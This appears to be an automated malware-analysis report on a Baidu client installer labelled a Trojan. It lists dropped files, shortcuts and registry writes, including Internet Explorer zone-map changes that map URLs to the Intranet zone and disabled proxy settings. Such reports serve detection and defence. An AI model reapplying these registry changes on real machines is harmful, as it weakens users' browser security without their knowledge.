%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\yinyue\1.0.0.0\PluginSetup.xml (616 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\bg-checkbox-checked.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\mg-newtab.png (197 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\top\1.png (3 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\xiaoxizhongxin\1.0.0.2\icon_xiaoxizhongxinNotify.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\general.png (379 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\green_arrow_down.png (150 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\cloudy.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\history_z.png (784 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\light-snow.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\se\icon-taobao.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\input.png (214 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\xiaoxizhongxin\1.0.0.2\XiaoXiUINotify.xml (412 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\error-pages_z.png (784 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\unknown.png (480 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\vedio_play.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\font\open-sans\OpenSans-Light-webfont.eot (784 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\bg-box-shadow-top-right.png (202 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\bookmarks\res\css\img\arrow-png8.png (260 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\Utils.dll (46592 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\bookmarks\res\css\img\folder-arrow-png8.png (292 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\bookmarks.css (9 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\icon-clear-general.png (866 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\bg-radio-checked.png (3 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\red_arrow_down.png (944 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\reset.css (826 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\gupiao\1.0.0.2\skinres.rdb (1856 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\dust.png (812 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\BrowserCore.dll (67072 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\bookmarks\res\css\ie-fix.css (1 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\xiaoxizhongxin\1.0.0.2\res_xiaoxizhongxinNotify.png (3 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\gupiao\1.0.0.2\loading.png (1552 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\ice-rain.png (784 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\js\bookmarks_mods.js (1856 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\se\icon-baidu.png (367 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\green_arrow_down.png (944 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\arrow.png (203 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\xinwen\1.0.0.0\PluginSetup.xml (616 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\sf.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\green_arrow_up.png (943 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\bg-circle-loading.png (6 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\red_arrow_down.png (150 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\xinwen\1.0.0.0\executor.xml (232 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\sc_tmp.dll.bdtmp (18424 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\Report.dll (7232 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\top\365.png (2 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\xinwen\1.0.0.0\loading.png (1552 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\moderate-snow.png (992 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\bookmarks\res\css\img\icon-tree-search-ie8.png (15 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\CommonWorker.dll (3712 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\top\343.png (4 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\unknown.png (851 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\bg-circle-loading-large.png (784 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\top\368.png (5 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\error-pages.css (7 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\sleet.png (436 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\bookmarks\res\css\img\png8-dialog-close.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\weixin\1.0.0.0\PluginSetup.xml (616 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\gz.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\BrowserFrame.dll (67494 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\logo25x29.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\top\qxdh20140619.png (2 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\Skins\AppContainer.rdb (10 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\cloudy.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr6.tmp\Report.dll (3616 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\duststorm.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\red_arrow_up.png (943 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\bg-button-new.png (977 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\thundershower-with-hail.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\jietu\1.0.0.0\skinres.rdb (23424 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\app-reload.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\bg-button.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\LocalPluginInfo.xml (4 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\moderate-rain.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\bg-searchbox.png (893 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\server-storm.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\DetectVm.dll (4784 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\snow-flurry.png (847 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\bookmarks\res\css\img\folder-arrow-hover-png8.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\resou\1.0.0.0\AppHTMLReSou.xml (438 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr6.tmp\Protocol.dll (12024 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\weixin\1.0.0.0\icon_weixin.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\storm.png (815 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\BDMSkin.dll (60928 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\mb_setup.log (2575 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr6.tmp\BDMSkin.dll (30464 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\Download.dll (4784 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\heavy-rain.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\music_play.png (960 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\BaiduUpdate.exe (11040 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\GlobalPluginInfo.xml (6 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\error-pages\connection-fail.html (2 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\js\libs\jquery.color-2.1.2.min.js (6 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\gupiao\1.0.0.2\AppHTMLGuPiao.xml (440 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\resou\1.0.0.0\loading.png (1552 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\new.png (232 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\heavy-rain.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\xiaoxizhongxin\1.0.0.2\icon_xiaoxizhongxin.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\bianqian\1.0.0.0\bianqianDll.dll (16 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\Skins\BrowserNotify.rdb (14384 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\bdb_scheme.dat (1484 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\mg-refresh.png (215 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\bianqian\1.0.0.0\executor.xml (187 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr6.tmp\res\InstallWnd.zip (3616 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\heavy-storm.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\light-rain.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\font\open-sans\OpenSans-Light-webfont.svg (4992 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\se\icon-baidu1.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\xiaoxizhongxin\1.0.0.2\AppHTMLXiaoXi.xml (440 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\bg-radio-tooltip-png8.png (329 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\thundershower.png (898 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\Skins\CommonRes.rdb (74736 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\duststorm.png (811 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\enter.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\user_data\default\bookmark\bookmark.db (20 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\split_g.png (968 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\atl100.dll (10128 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\top\347.png (4 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\download.png (177 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\js\libs\dataReport.js (3 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\pack.css (784 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\red_arrow_up.png (154 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\CheckerProxy.dll (10128 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\xinwen\1.0.0.0\skinres.rdb (1856 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\resou\1.0.0.0\icon_resou.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\bookmarks\res\css\img\head-star-png8.png (450 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\severe-storm.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\bookmarks\res\css\img\png8-dialog.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\BDClientProxy.dll (45104 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\overcast.png (680 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\ala.png (3 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\font\open-sans\OpenSans-Light-webfont.ttf (1552 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\sunny.png (856 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\mg-foward.png (156 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\light-snow.png (918 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\settings_z.png (11 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\bg-box-shadow-top-center.png (122 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\gupiao\1.0.0.2\res_gupiao.png (3 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\split_g.png (248 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\Heartbeat.dll (14384 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\moderate-snow.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\error-pages\ssl-error.html (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\png8-login-success.png (824 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\mg-back.png (154 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\kuaidi.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\Baidu.exe (24048 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\sand.png (1 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsr4.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr6.tmp (0 bytes)
The process Baidu.exe:808 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\user_data\default\settings\user_setting.db (24 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\user_data\default\blank_tab\new_tab.db-journal (512 bytes)
%Documents and Settings%\All Users\Baidu\BDCLProxy\10000302_130895171752697500.dat (314 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\user_data\stock.pb (2 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\CheckerExe.exe (63735 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\user_data\default\auto_complete\auto_complete.db (284596 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\user_data\default\bookmark\bookmark.db.bak (10 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\user_data\default\auto_complete\auto_complete.db-journal (5454 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\user_data\novel.pb (2 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\common\settings\default_setting.db (24 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\user_data\default\blank_tab\new_tab.db (145 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\user_data\default\blank_tab\new_tab.db-journal (0 bytes)
%Documents and Settings%\All Users\Baidu\BDCLProxy\10000302_130895171752697500.dat (0 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\user_data\default\auto_complete\auto_complete.db-journal (0 bytes)
The process Baidu.exe:1836 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Desktop\百度.lnk (1 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\百度\å¸载百度.lnk (1 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\百度.lnk (1 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Internet Explorer\Quick Launch\百度.lnk (1 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\百度\百度.lnk (1 bytes)
The process YouQian_Setup.exe:1488 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\All Users\Application Data\Baidu\Common\Global.db (100 bytes)
Registry activity
The process %original file name%.exe:856 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1B 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E0 8F 1D B3 33 71 2A 29 F8 42 02 F5 12 48 40 E4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process Baidu_Setup_1.6.200.359_ftn_1050103060.exe:1308 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "5A 4A 86 52 67 75 0D F3 B0 95 A1 D3 7C BF 36 EB"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Baidu\BaiduYouQian\packageinstall]
"param" = "Xxjh9G0tXMLez7O2T5upZbVkEFeGSirxy9dYQekwVzz3Z1ikJ jGDPSC0WRykW8aBmNrUQLi0OivztreQTX3edZTHioyulIhwOqiMyhdNK5MIUOU gYtMOfnR5maiaU9pCLak4mk2g7IGTEYLRGOkoo0QxbHsGj8Iv7jDuuJCgpSTL4Y2DQ0HuRIvWnwySHLybfpSRZkg29W8v/4oj0Bw2BJW6DWTg9VdBGmSEvZ1Ts8wvoZ41Dg nELDVclUFp2ihqcJPWYwTXJCCUc98tEqHuPf1CmzlAFFQaavUCwz/Geq45ALZiGAvlfHXZEJ5fQ50uD7lzwPCim6hqqGPp ra6HcmESFC6V1MGyIxU4kJzPtnT2xv67aOTXPT8nGfpbFBbAHxoLdmNabYU fdZPJ c U3HbzBeoO/qJaLe5hDaCjLD0a9EnDBDJ1izfKUw/Wxw0t3hDna1QSle7Y9kQ6bW GTxGl/lceIohXMputK67QsdQZRh QJ6EkgMFnwwh"
The process Baidu_Setup_1.6.200.359_ftn_1050103060.exe:492 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPoicy\{73F970DA-48AC-43F1-9848-FB90504CE3E9}]
"Policy" = "3"
[HKLM\SOFTWARE\Baidu\Baidu]
"TN" = "SE_Baiduclient_9vpgkwv8"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359]
"baidu.exe" = "百度主程åºÂ"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
